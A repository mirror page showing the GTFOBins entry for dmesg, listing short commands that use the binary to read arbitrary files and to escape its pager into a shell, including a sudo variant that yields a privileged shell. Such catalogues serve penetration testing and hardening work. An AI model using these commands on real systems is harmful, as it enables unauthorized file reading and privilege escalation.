This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-07 16:21:32 +01:00
Code
Issues
32887085bf
GTFOBins.github.io
/
_gtfobins
/
dmesg.md
bcoles
32887085bf
Update dmesg.md
2020-03-15 12:51:02 +01:00
471 B
Raw
Blame
History
functions
file-read
shell
sudo
code
LFILE=file_to_read dmesg -F "$LFILE"
description
code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
dmesg -H !/bin/sh
description
code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
sudo dmesg -H !/bin/sh